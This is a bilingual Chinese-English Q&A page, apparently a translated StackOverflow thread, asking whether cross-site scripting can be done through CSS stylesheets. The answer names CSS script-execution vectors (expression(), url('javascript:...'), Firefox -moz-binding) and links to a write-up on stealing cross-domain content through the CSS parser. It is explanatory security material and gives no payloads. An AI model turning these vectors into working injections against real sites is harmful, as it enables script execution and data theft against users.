CSS样式表中的跨站脚本 [英] Cross Site Scripting in CSS Stylesheets

问题描述

是否可以在CSS样式表中使用跨网站脚本？例如，一个引用样式表包含恶意代码，你会怎么做？
我知道你可以使用样式表，但是样式表呢？

解决方案 //code.google.com/p/browsersec/wiki/Part1#Cascading_stylesheetsrel =nofollow noreferrer>浏览器安全手册

JavaScript执行的风险。作为一个鲜为人知的功能，一些CSS实现允许JavaScript代码嵌入样式表。有至少三种方法来实现这个目标：通过使用表达式（...）指令，它能够评估任意JavaScript语句，并使用它们的值作为CSS参数;通过在支持它的属性上使用url（'javascript：...'）指令;或者调用浏览器特有的功能，例如 Firefox的moz绑定机制。

...在阅读之后，我在StackOverflow上找到了这个。请参见在CSS中使用Javascript
在Firefox中，您可以使用< a href =http://www.mozilla.org/projects/xbl/ =nofollow noreferrer> XBL 通过CSS在页面中插入JavaScript。但是，XBL文件必须位于同一域中，现在错误324253已修复 a>。

有一个有趣的（虽然不同于你的问题）的方式来滥用CSS。请参见 http://scarybeastsecurity.blogspot.com/2009 /12/generic-cross-browser-cross-domain.html 。基本上，你滥用CSS解析器从不同的域中窃取内容。

Is it possible to use cross site scripting in a CSS stylesheet? For example a reference stylesheet contains malicious code, how would you do this? I know you can use style tags but what about stylesheets?

解决方案

From the browser security handbook

The risk of JavaScript execution. As a little-known feature, some CSS implementations permit JavaScript code to be embedded in stylesheets. There are at least three ways to achieve this goal: by using the expression(...) directive, which gives the ability to evaluate arbitrary JavaScript statements and use their value as a CSS parameter; by using the url('javascript:...') directive on properties that support it; or by invoking browser-specific features such as the -moz-binding mechanism of Firefox.

... and after reading that, I find this on StackOverflow. See Using Javascript in CSS In Firefox, you can use XBL to inject javascript in a page via CSS. However, the XBL file must reside in the same domain, now that bug 324253 is fixed.

There is another interesting (though different from your question) way to abuse CSS. See http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html. Essentially, you misuse the CSS parser to steal content from a different domain.

这篇关于CSS样式表中的跨站脚本的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！